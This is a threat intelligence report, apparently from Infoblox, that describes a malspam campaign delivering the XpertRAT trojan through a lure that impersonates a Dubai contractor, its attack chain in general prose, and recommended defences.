Author: Shashank Jain
1. Overview
From 9 to 16 September, Infoblox observed a malicious spam (malspam) campaign whose actors were impersonating an employee of the Dubai-based engineering and construction company Arar Infra Contracting LLC. The body of the malspam email attempted to lure its targets into opening an attached file with XpertRAT: a remote access trojan that has been around since 2011.
XpertRAT consists of a core component and multiple modules, all written in Delphi. Its remote access capability makes it popular among many cybercriminals. It is usually propagated via spam emails, but pirated media and fraudulent updates have also been used to propagate it.1
2. Customer impact
Upon infecting a machine and establishing remote access, XpertRAT can steal credentials and system information, including operating system versions and running processes, and communicate with command and control (C&C) servers to exfiltrate data, download additional malware components, and execute arbitrary commands.
3. Campaign analysis
The campaign continuously sent spam for almost an hour, and all emails contained the same urgently themed message and subject lines that looked like inquiries about construction equipment, projects, and product names. The sender domain was spoofed; the emails appeared to be coming from an employee of Arar Infra Contracting LLC. The attachment’s name consisted of PO or Specification followed by a date or a random string.
4. Attack chain
The email attachment consists of an unsigned RTF (Rich Text Format) file with malicious VBA code. When the file is opened, the VBA code executes a PowerShell script to download the first payload from a malicious domain with a name that mimics ESET NOD32, a legitimate security product.
The first payload is a downloader, and it downloads a portable executable file, EXCEL.exe. The executable checks for an internet connection by pinging google.com, starts Internet Explorer, connects to a C&C server, and downloads a second payload, EXCEL.exe, which is the XpertRAT executable. XpertRAT then uses NirSoft utilities to collect credentials and read personal data from the browser.
5. Vulnerabilities and mitigation
XpertRAT is equipped with functions that make it a prolific stealer of credentials and other information. Infoblox recommends the following methods for detecting, preventing, and mitigating XpertRAT attacks:
- Install and run advanced antivirus software that can detect, quarantine, and remove malware.
- Be cautious of emails from unfamiliar senders, and inspect attachments before opening them.
- Develop traffic rules that can block outbound access to potentially malicious endpoints according to domains or unique URI parameters.
- Implement PowerShell logging to detect any anomalous or malicious use.
- Install strong email security solutions to detect emails with suspicious content.
- Install system and application updates as soon as they become available.
- Do not enable editing or macros in Microsoft Office attachments, especially for files whose only apparent contents are directions for enabling editing or macros.
